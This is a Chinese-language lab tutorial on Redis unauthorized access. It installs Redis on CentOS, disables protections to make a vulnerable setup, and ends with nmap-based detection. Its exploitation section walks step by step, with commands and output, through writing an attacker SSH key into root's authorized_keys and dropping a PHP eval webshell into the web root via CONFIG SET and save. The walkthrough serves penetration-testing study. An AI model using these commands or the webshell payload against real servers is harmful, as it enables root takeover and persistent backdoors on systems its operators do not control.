Redis未授权访问漏洞

0x01 Centos7安装redis服务

1、下载redis

[root@localhost ~]# wget http://download.redis.io/releases/redis-5.0.5.tar.gz
--2019-06-19 10:25:18--  http://download.redis.io/releases/redis-5.0.5.tar.gz
正在解析主机 download.redis.io (download.redis.io)... 109.74.203.151
正在连接 download.redis.io (download.redis.io)|109.74.203.151|:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：1975750 (1.9M) [application/x-gzip]
正在保存至: “redis-5.0.5.tar.gz”

100%[===================================================>] 1,975,750   23.4KB/s 用时 2m 6s  

2019-06-19 10:27:25 (15.3 KB/s) - 已保存 “redis-5.0.5.tar.gz” [1975750/1975750])

2、解压编译

[root@localhost ~]# tar -zxf redis-5.0.5.tar.gz 
[root@localhost ~]# cd redis-5.0.5/
[root@localhost redis-5.0.5]# make

##  报错
[root@localhost redis-5.0.5]# make test                
You need tcl 8.5 or newer in order to run the Redis test   
##  解决方案
[root@localhost redis-5.0.5]# yum install tcl -y

##  报错
[root@localhost redis-5.0.5]# make test                
!!! WARNING The following tests failed:
[err]: pending querybuf: check size of pending_querybuf after set a big value in tests/unit/pendingquerybuf.tcl
the used_memory of replica is much larger than master. Master:43865992 Replica:85809000
[err]: Active defrag in tests/unit/memefficiency.tcl
##  解决方案修改对应文件
[root@localhost redis-5.0.5]# vim tests/unit/memefficiency.tcl 
# Wait for the active defrag to stop working.
                wait_for_condition 1500 1000 {
                    [s active_defrag_running] eq 0
                } else {
                    after 120 ;# serverCron only updates the info once in 100ms
                    puts [r info memory]
                    puts [r memory malloc-stats]
                    fail "defrag didn't stop."
                }
##  安装成功
[root@localhost redis-5.0.5]# make test   
All tests passed without errors!

0x02 构建漏洞环境

1、 启动Centos7中的redis服务器

        建议先关闭防火墙，否则远程主机连接本地服务器的时候可能会显示No route to host。修改完配置文件后，关闭redis服务器后使用./redis-server命令再次启动redis服务器，此时修改后的配置文件不会生效。必须用 ./redis-server redis.conf命令启动redis服务器，才会使配置文件生效。

##  首先关闭防火墙
[root@localhost ~]# service firewalld stop
Redirecting to /bin/systemctl stop firewalld.service

## 开启redis服务器
[root@localhost redis-5.0.5]# cd src
[root@localhost src]# ./redis-server

## 修改配置文件后开启redis服务器
[root@localhost redis-5.0.5]# cd src
[root@localhost src]# ./redis-server redis.config

2、修改配置文件制作漏洞环境

        Redis protected-mode 是3.2版本之后加入的新特性，在Redis.conf的注释中，可以知道它的具体作用和启用条件。如果redis版本在3.3之前，则不需要配置漏洞环境，直接进行步骤三。因为之前的版本都是默认绑定0.0.0.0:6379这个地址，远程主机可以直接访问。

当 protected-mode设置成yes而且bind地址设置成127.0.0.1时。远程主机可以连接到redis服务，但是在使用redis命令时，会报如下的错误。

[root@localhost redis-5.0.5]# vim redis.conf 
bind 127.0.0.1
protected-mode yes

#在如上配置下，使用远程主机连接本地redis服务器，虽然可以连接上，但是会报如下错误。
root@kali:~/redis-5.0.5# ./src/redis-cli -h 192.168.231.134
192.168.231.134:6379> info
DENIED Redis is running in protected mode because protected mode is enabled, 
no bind address was specified, no authentication password is requested to clients. 

当 protected-mode设置成no，而且bind地址设置成127.0.0.1时，这时会拒绝远程主机的连接，只能在用本地服务器进行连接。

[root@localhost redis-5.0.5]# vim redis.conf 
bind 127.0.0.1
protected-mode no

#在如上配置下，使用远程主机连接本地redis服务器会遭到拒绝。
root@kali:~/redis-5.0.5# ./src/redis-cli -h 192.168.231.134
Could not connect to Redis at 192.168.231.134:6379: Connection refused
not connected> 

当 protected-mode设置成no，而且bind地址设置成0.0.0.0时，或者注释掉#127.0.0.1，这时远程主机连接redis服务器的时候就跟本地使用redis服务器差不多，就构建成了漏洞环境。

[root@localhost redis-5.0.5]# vim redis.conf 
#bind 127.0.0.1          #可以吧bind 127.0.0.1给注释到
bind 0.0.0.0             #也可以吧bind 127.0.0.1修改成bind 0.0.0.0
protected-mode no

#在如上配置下，使用远程主机连接本地redis服务器会正常访问。
root@kali:~/redis-5.0.5# ./src/redis-cli -h 192.168.231.134
192.168.231.134:6379> info
# Server
redis_version:5.0.5
          ........

0x03漏洞利用方法

1、使用公钥登录Redis服务器

        原理就是在数据库中插入一条数据，把远程主机的公钥作为value，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里，这样就可以在服务器端的/root/.ssh下生一个授权的key。

##  没有创建.ssh目录
root@kali:~# cd .ssh/  
root@kali:~/.ssh# 
root@kali:~/.ssh# ls
known_hosts

## 没有公钥生成公钥
root@kali:~/.ssh# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:iG8O+z5kBqfDu5yiuuVcwQCleuT26pc7BfBSSjlBt9k root@kali


## 将生成的公钥保存到1.txt
root@kali:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts
root@kali:~/.ssh# (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt
root@kali:~/.ssh# ls
1.txt  id_rsa  id_rsa.pub  known_hosts

## 将1.txt写入redis
root@kali:~/.ssh# cp 1.txt /root/redis-5.0.5/src/
root@kali:~/.ssh# cd /root/redis-5.0.5/src/
root@kali:~/redis-5.0.5/src# cat 1.txt | ./redis-cli -h 192.168.231.134 -x set hack
OK

## 设置redis的备份路径为/root/.ssh和保存文件名authorized_keys
root@kali:~/redis-5.0.5/src# ./redis-cli -h 192.168.231.134
192.168.231.134:6379> CONFIG SET dir /root/.ssh
OK
192.168.231.134:6379> CONFIG SET dbfilename authorized_keys
OK
192.168.231.134:6379> keys *
1) "hack"
192.168.231.134:6379> save
OK

## 远程服务器SSH连接Redis服务器
root@kali:~/.ssh# ssh -i id_rsa root@192.168.231.134
Last login: Wed Jun 19 11:45:53 2019
[root@localhost ~]# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.231.134  netmask 255.255.255.0  broadcast 192.168.231.255
        inet6 fe80::f856:ac64:ecf1:a14  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:b7:ba:75  txqueuelen 1000  (Ethernet)
        RX packets 3113  bytes 216089 (211.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1494  bytes 178566 (174.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

2、写入WEBshell

        webshell可以用web的方式，控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。webshell 最大的优点就是可以穿越防火墙，由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的，因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。

## 写入WEBshell
root@kali:~/redis-5.0.5/src# ./redis-cli -h 192.168.231.134
192.168.231.134:6379> config set dir /var/www/html
OK
192.168.231.134:6379> set webshell "\n\n<?php @eval($_POST['pass']);?>\n\n"
OK
192.168.231.134:6379> CONFIG SET dbfilename test.php
OK
192.168.231.134:6379> save
OK

##   SSH连接查看写入的文件
[root@localhost ~]# ifconfig ens33
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.231.134  netmask 255.255.255.0  broadcast 192.168.231.255
        inet6 fe80::f856:ac64:ecf1:a14  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:b7:ba:75  txqueuelen 1000  (Ethernet)
        RX packets 3836  bytes 269636 (263.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2050  bytes 233207 (227.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[root@localhost ~]# cat /var/www/html/test.php 
REDIS0009�  redis-ver5.0.5�
�edis-bits�@�ctime�S�   ]used-mem�`
 aof-preamble��webshell"

<?php @eval($_POST['pass']);?>
   .................

0x04 漏洞检测方法

1、单个漏洞检测可以使用namp

检测到具有未授权访问漏洞的服务器。

root@kali:~/.ssh# nmap -sS -sV -p 6379 -Pn -n --script="redis-info" 192.168.231.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 13:30 CST
Nmap scan report for 192.168.231.134
Host is up (0.00031s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.5 (64 bits)
| redis-info: 
|   Version: 5.0.5
|   Operating System: Linux 3.10.0-957.el7.x86_64 x86_64
|   Architecture: 64 bits
|   Process ID: 12197
|   Used CPU (sys): 2.656197
|   Used CPU (user): 0.941046
|   Connected clients: 2
|   Connected slaves: 0
|   Used memory: 855.51K
|   Role: master
|   Bind addresses: 
|     0.0.0.0
|   Client connections: 
|_    192.168.231.130
MAC Address: 00:0C:29:B7:BA:75 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds

检测到处于保护视图下可以远程连接的redis服务器

C:\Users\14017>nmap -sS -sV -Pn -p 6379 -n --script="redis-info" 192.168.231.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 13:32 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.231.130
Host is up (0.00013s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis?
| fingerprint-strings:
|   NULL:
|_    -DENIED Redis is running in protected mode because protected mode is enabled,
 no bind address was specified, no authentication password is requested to clients. 
MAC Address: 00:0C:29:B4:11:00 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds

2、批量检测可以使用SNETCracker超级弱口令检测工具

##下载地址
SNETCracker超级弱口令检测工具最新版本下载地址：
https://github.com/shack2/SNETCracker/releases/download/1.0.20190522/V1.0.Beta26.20190522.zip

批量检测工具